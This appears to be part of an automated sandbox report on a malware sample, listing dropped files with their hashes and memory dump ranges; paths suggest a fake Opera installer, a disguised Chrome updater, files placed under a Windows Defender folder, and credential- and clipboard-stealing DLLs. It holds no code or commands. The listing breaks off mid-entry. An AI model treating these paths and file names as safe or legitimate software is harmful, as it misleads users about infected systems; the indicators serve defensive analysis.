SHA512 47c6cb2571269863d85530b9497c230b20fb32cb62f754edbf14b03b87ae154866bebc2844fa7f05537422705626357cf3f58086670ece1370fc94bb9b4b281d

C:\Users\Admin\AppData\Local\Temp\is-IUM7O.tmp\iAR3NEjxEx9jqAJE43HxlJxh.tmp

MD5 ebec033f87337532b23d9398f649eec9
SHA1 c4335168ec2f70621f11f614fe24ccd16d15c9fb
SHA256 82fdd2282cf61cfa6155c51a82c4db79487ffeb377d0245d513edeb44d731c16
SHA512 3875c2dd9bbeb5be00c2ccf8391bcb92d328a3294ce5c2d31fd09f20d80e12bd610d5473dfc2e13962578e4bb75336615cdf16251489a31ecbe4873d09cf1b11

memory/4584-157-0x0000000001040000-0x000000000158D000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

memory/560-168-0x00000000001F0000-0x00000000001F1000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050341177314584.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/5032-177-0x00000000008C0000-0x00000000008C1000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050341191222228.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\Local\Temp\is-6IF8E.tmp\_isetup\_setup64.tmp

MD5 e4211d6d009757c078a9fac7ff4f03d4
SHA1 019cd56ba687d39d12d4b13991c9a42ea6ba03da
SHA256 388a796580234efc95f3b1c70ad4cb44bfddc7ba0f9203bf4902b9929b136f95
SHA512 17257f15d843e88bb78adcfb48184b8ce22109cc2c99e709432728a392afae7b808ed32289ba397207172de990a354f15c2459b6797317da8ea18b040c85787e

memory/2228-186-0x0000000001310000-0x000000000185D000-memory.dmp

memory/1596-181-0x00000000740B0000-0x000000007479E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310050341191222228.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\ErUlK6xejTvgF1mGobsQGIri.exe

MD5 98e1435808fa674502e204274664244d
SHA1 695b99b0b0e8918792481763d2aa62270e0857fd
SHA256 1ca53111921935d617e41ce984fb1a68aabb265165668bf0c2d35fb2f73eaf10
SHA512 47c6cb2571269863d85530b9497c230b20fb32cb62f754edbf14b03b87ae154866bebc2844fa7f05537422705626357cf3f58086670ece1370fc94bb9b4b281d

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe

MD5 98e1435808fa674502e204274664244d
SHA1 695b99b0b0e8918792481763d2aa62270e0857fd
SHA256 1ca53111921935d617e41ce984fb1a68aabb265165668bf0c2d35fb2f73eaf10
SHA512 47c6cb2571269863d85530b9497c230b20fb32cb62f754edbf14b03b87ae154866bebc2844fa7f05537422705626357cf3f58086670ece1370fc94bb9b4b281d

memory/4204-154-0x0000000004F20000-0x0000000004F30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe

MD5 98e1435808fa674502e204274664244d
SHA1 695b99b0b0e8918792481763d2aa62270e0857fd
SHA256 1ca53111921935d617e41ce984fb1a68aabb265165668bf0c2d35fb2f73eaf10
SHA512 47c6cb2571269863d85530b9497c230b20fb32cb62f754edbf14b03b87ae154866bebc2844fa7f05537422705626357cf3f58086670ece1370fc94bb9b4b281d

memory/3256-145-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\Pictures\tPBVrOz9nznq7EI1j7HnHSNW.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

C:\Users\Admin\Pictures\tPBVrOz9nznq7EI1j7HnHSNW.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

memory/4204-140-0x0000000005200000-0x00000000053C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-PL13U.tmp\f2aWE99yFgIVRBiiaEPY6g1L.tmp

MD5 83827c13d95750c766e5bd293469a7f8
SHA1 d21b45e9c672d0f85b8b451ee0e824567bb23f91
SHA256 8bd7e6b4a6be9f3887ac6439e97d3d3c8aaa27211d02ecbd925ab1df39afe7ae
SHA512 cdbdd93fc637772b12bdedb59c4fb72a291da61e8c6b0061ad2f9448e8c949543f003646b1f5ce3e1e3aebc12de27409ddd76d3874b8f4f098163a1ff328b6f0

memory/2512-135-0x0000000001040000-0x000000000158D000-memory.dmp

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe

MD5 98e1435808fa674502e204274664244d
SHA1 695b99b0b0e8918792481763d2aa62270e0857fd
SHA256 1ca53111921935d617e41ce984fb1a68aabb265165668bf0c2d35fb2f73eaf10
SHA512 47c6cb2571269863d85530b9497c230b20fb32cb62f754edbf14b03b87ae154866bebc2844fa7f05537422705626357cf3f58086670ece1370fc94bb9b4b281d

memory/3820-190-0x00000000740B0000-0x000000007479E000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050341219034540.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1bfe591a4fe3d91b03cdf26eaacd8f89
SHA1 719c37c320f518ac168c86723724891950911cea
SHA256 9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8
SHA512 02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 81db4784ac846489d39d2d53c7e89706
SHA1 1547074f9be829d3ee9b31cd32ca6bce063a489c
SHA256 1e558912d8bb4255b02663441618a5a90f93cd1ee69fe07aa13a113cb6df09da
SHA512 ff9ef77c6adc42f3b79386e1b16e845d8333c99b1f00de084d24463af8c6112d83239b4e9a792e825c2aeeb5108bcefc2789e7b1d09b0a6975af923bd72fba26

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 60fe01df86be2e5331b0cdbe86165686
SHA1 2a79f9713c3f192862ff80508062e64e8e0b29bd
SHA256 c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8
SHA512 ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 c5356f5bc16a6a748c182b7b61cba8aa
SHA1 1c9d8b4c26814194cc1abc20434ffeefdae6239d
SHA256 8210fb488a2cd7ee1cc548df35a7448e146f61cb0c69f73e98b97d5debed9856
SHA512 07102c8fc4a904c16be0efab40d5631064a62e2611580ebc1997b375cdd4b2036ae20973538b364882315e61d47a0ad9fc9413e739d8b6da87b8ccdf5d03630b

memory/4892-238-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe

MD5 98e1435808fa674502e204274664244d
SHA1 695b99b0b0e8918792481763d2aa62270e0857fd
SHA256 1ca53111921935d617e41ce984fb1a68aabb265165668bf0c2d35fb2f73eaf10
SHA512 47c6cb2571269863d85530b9497c230b20fb32cb62f754edbf14b03b87ae154866bebc2844fa7f05537422705626357cf3f58086670ece1370fc94bb9b4b281d

C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

memory/3256-249-0x0000000000400000-0x00000000004D8000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050341264192368.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/2512-254-0x0000000001040000-0x000000000158D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 33d121e70f2649810ea94c9376ef2570
SHA1 ccd25cffc8a607efb1c05f00874d0332bea2c07e
SHA256 b527bbdb49ffbf2ca8500e7a74d7656f57db092a9227a75621fb4a9cc53b520d
SHA512 c055cd955e7d60c720f8dead43cfd3d2d9275d338b494e9d63e26aacb5825085f4f395625905780400f69de99d7393e5101632b12206999b070677cfd8498c10

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 33d121e70f2649810ea94c9376ef2570
SHA1 ccd25cffc8a607efb1c05f00874d0332bea2c07e
SHA256 b527bbdb49ffbf2ca8500e7a74d7656f57db092a9227a75621fb4a9cc53b520d
SHA512 c055cd955e7d60c720f8dead43cfd3d2d9275d338b494e9d63e26aacb5825085f4f395625905780400f69de99d7393e5101632b12206999b070677cfd8498c10

memory/2328-263-0x000002122EF30000-0x000002122EFB4000-memory.dmp

memory/560-262-0x0000000000400000-0x0000000000513000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

memory/3252-240-0x00007FF7A9500000-0x00007FF7A9A43000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-IUM7O.tmp\iAR3NEjxEx9jqAJE43HxlJxh.tmp

MD5 ebec033f87337532b23d9398f649eec9
SHA1 c4335168ec2f70621f11f614fe24ccd16d15c9fb
SHA256 82fdd2282cf61cfa6155c51a82c4db79487ffeb377d0245d513edeb44d731c16
SHA512 3875c2dd9bbeb5be00c2ccf8391bcb92d328a3294ce5c2d31fd09f20d80e12bd610d5473dfc2e13962578e4bb75336615cdf16251489a31ecbe4873d09cf1b11

memory/5032-278-0x0000000000400000-0x000000000071C000-memory.dmp

memory/3820-280-0x00000000012B0000-0x00000000012C0000-memory.dmp

memory/2368-281-0x0000000001040000-0x000000000158D000-memory.dmp

memory/3820-282-0x0000000008F60000-0x0000000008F93000-memory.dmp

memory/2408-286-0x0000000002A70000-0x0000000002BE1000-memory.dmp

memory/2408-288-0x0000000002BF0000-0x0000000002D21000-memory.dmp

memory/3820-287-0x0000000008100000-0x000000000811E000-memory.dmp

memory/4540-291-0x0000000001040000-0x000000000158D000-memory.dmp

memory/2328-296-0x0000021230BE0000-0x0000021230C3E000-memory.dmp

memory/3820-297-0x0000000009090000-0x0000000009135000-memory.dmp

memory/2328-295-0x0000021230B20000-0x0000021230B30000-memory.dmp

memory/3820-293-0x000000007F300000-0x000000007F310000-memory.dmp

memory/2328-283-0x00007FFCE2B50000-0x00007FFCE353C000-memory.dmp

memory/3820-285-0x0000000070B40000-0x0000000070B8B000-memory.dmp

memory/2328-284-0x0000021230B80000-0x0000021230BE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\384669652227

MD5 88b0f3a71d80fd9b7d5ebc4c8cadd948
SHA1 289150414d75d93148853f2c2ab243c5836d757a
SHA256 c1a3b082a06a449c50d6ef22bc1b07af71c59a6bae8e7231c0d78706c9532be9
SHA512 ea3a44e1b983efed161df4974140816af6b7b34eb9026df122c36a428e0297f4bab53865b1e3adcd91306ef36dd6900ff4a19f4518b84b8a64637335b0d4557f

memory/4204-305-0x00000000740B0000-0x000000007479E000-memory.dmp

memory/3820-306-0x00000000012B0000-0x00000000012C0000-memory.dmp

memory/3820-307-0x0000000009290000-0x0000000009324000-memory.dmp

memory/4204-311-0x00000000063A0000-0x00000000068CC000-memory.dmp

memory/3252-317-0x00007FF7A9500000-0x00007FF7A9A43000-memory.dmp

memory/5032-338-0x0000000000400000-0x000000000071C000-memory.dmp

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

MD5 3945df42a2cbe47502705ecde2ff2a87
SHA1 1545a5a72ffaf6c6c8e9df0ca6aa8d2aff5cc5b5
SHA256 c767ecc88396047716862b881480450b517715bfc7bdd12c878cf2d54262f1f8
SHA512 0850ac896ae1d8e766d34746294d212fe071c45e0f740085d37236e0caa05d823ad4ddfeba2baf1bcc71b20612058f08dbafd62fb3deb1a8ed1074d2eae71ead

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

MD5 3945df42a2cbe47502705ecde2ff2a87
SHA1 1545a5a72ffaf6c6c8e9df0ca6aa8d2aff5cc5b5
SHA256 c767ecc88396047716862b881480450b517715bfc7bdd12c878cf2d54262f1f8
SHA512 0850ac896ae1d8e766d34746294d212fe071c45e0f740085d37236e0caa05d823ad4ddfeba2baf1bcc71b20612058f08dbafd62fb3deb1a8ed1074d2eae71ead

memory/3308-349-0x00007FFCE2B50000-0x00007FFCE353C000-memory.dmp

memory/3308-354-0x0000021D98C10000-0x0000021D98C20000-memory.dmp

memory/3308-356-0x0000021D98C10000-0x0000021D98C20000-memory.dmp

memory/4204-359-0x0000000004F20000-0x0000000004F30000-memory.dmp

memory/3308-362-0x0000021DB1330000-0x0000021DB1352000-memory.dmp

memory/5032-364-0x0000000000400000-0x000000000071C000-memory.dmp

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

MD5 3945df42a2cbe47502705ecde2ff2a87
SHA1 1545a5a72ffaf6c6c8e9df0ca6aa8d2aff5cc5b5
SHA256 c767ecc88396047716862b881480450b517715bfc7bdd12c878cf2d54262f1f8
SHA512 0850ac896ae1d8e766d34746294d212fe071c45e0f740085d37236e0caa05d823ad4ddfeba2baf1bcc71b20612058f08dbafd62fb3deb1a8ed1074d2eae71ead

memory/3256-378-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/3308-387-0x0000021DB14E0000-0x0000021DB1556000-memory.dmp

C:\Program Files\Windows Defender Advanced Threat Protection\WGNGCLTPEK\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

memory/3732-421-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2328-427-0x00007FFCE2B50000-0x00007FFCE353C000-memory.dmp

C:\Program Files\Windows Defender Advanced Threat Protection\WGNGCLTPEK\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

C:\Users\Admin\AppData\Local\Temp\07-19e1b-f63-ad5bc-9c3e8653caf7d\Kizhigobaely.exe.config

MD5 98d2687aec923f98c37f7cda8de0eb19
SHA1 f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7
SHA256 8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465
SHA512 95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

memory/2408-436-0x0000000002BF0000-0x0000000002D21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\07-19e1b-f63-ad5bc-9c3e8653caf7d\Kizhigobaely.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 101343244d619fd29dc007b34351865b
SHA1 a721bf0ee99f24b3e6c263033cfa02a63d4175cc
SHA256 286038573287d04ce980461054d2377b71ab4eb8a37e466b38d120ad7f93a043
SHA512 1a40055b9e2186d142059ab12afc82a21767f9fbfe98345be40f67619d128fb261f6afef74b25ba52b8f80480bb86e06006047de1b9505d5a65f7d7ee3ce0209

memory/4432-444-0x00000000012E0000-0x00000000012F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\07-19e1b-f63-ad5bc-9c3e8653caf7d\Kizhigobaely.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

C:\Users\Admin\AppData\Local\Temp\is-31GRO.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

memory/560-466-0x0000000000400000-0x0000000000513000-memory.dmp

memory/4892-473-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-OD5HG.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-31GRO.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

memory/4876-502-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/3732-507-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\opera_package

MD5 1b4af0087d5df808f26f57534a532aa9
SHA1 d32d1fcecbef0e361d41943477a1df25114ce7af
SHA256 22c21ff3d0f5af1c2191318ea12921cfd5434afc32c0641d58fd3f3a218ea111
SHA512 e5a32022fd08464a24c89819703fd9f05c75bd5b47392aae186b96a8e1146fb0c98cda14bfec9a1393c0cdde706db77d32e7a9a86e4611c72103265982d31e07

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

memory/3252-804-0x00007FF7A9500000-0x00007FF7A9A43000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 787696eec404522d2ee4fc5268d953ed
SHA1 9f0bac6098bde2edf7fee8004d5587e179d3f863
SHA256 ba6b056c813be12d66509f318ab294913f01edb28cf78ad67442cbded496dfc1
SHA512 93d32752aa03d43af7c2d1685208bc4b4c9c40f0c9651d91856e5130a1faef3e51272c71a75e04033fbcf26b37eccf6d3a8ad899578bafd25d79fe1976680b96

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\assistant_installer.exe

MD5 0d88834a56d914983a2fe03d6c8c7a83
SHA1 e1ecd04c3610fe5f9df9bb747ee4754ccbdddb35
SHA256 e61426a4c8d7d18d497e7ae7db69c470bae545a630e2d27eada917135fc65f53
SHA512 95233cbcc81838b16825ab7bd52981d99ae4ec27c91fcd5285bff5c4e6fcea43f4a0c78617c0b9404fb69d6d83871b32f0ed6c58ca62e73e41cd999b813c3fc1

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/3252-851-0x00007FF7A9500000-0x00007FF7A9A43000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\dbghelp.dll

MD5 2215b082f5128ab5e3f28219f9c4118a
SHA1 20c6e3294a5b8ebbebb55fc0e025afff33c3834d
SHA256 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d
SHA512 3e1249a0b4baad228045f4869273821f97a0cd108bc9385478e562e91830f6bc369810d6f4021c6e04e79b9ec0f4088056f4998950af46f6ab50366522aa887d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\dbgcore.DLL

MD5 15a2bc75539a13167028a3d2940bf40a
SHA1 1aed6d2855b26aa7a8fb06d690a89da3fc8eca86
SHA256 07465dffa02c99d11dcd0a81ab7cea1fc97ef6666f37b2fd10592c1c463bf693
SHA512 141d44339fb706971a0b481e1987a0a0eb71e63d485404548ff7443ddf744a8b6a5f869c33e49141b974cdaf17e0a654785c8ddac789c2fb821ba0a8b72dea9d

\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\dbghelp.dll

MD5 2215b082f5128ab5e3f28219f9c4118a
SHA1 20c6e3294a5b8ebbebb55fc0e025afff33c3834d
SHA256 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d
SHA512 3e1249a0b4baad228045f4869273821f97a0cd108bc9385478e562e91830f6bc369810d6f4021c6e04e79b9ec0f4088056f4998950af46f6ab50366522aa887d

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 49b3faf5b84f179885b1520ffa3ef3da
SHA1 c1ac12aeca413ec45a4f09aa66f0721b4f80413e
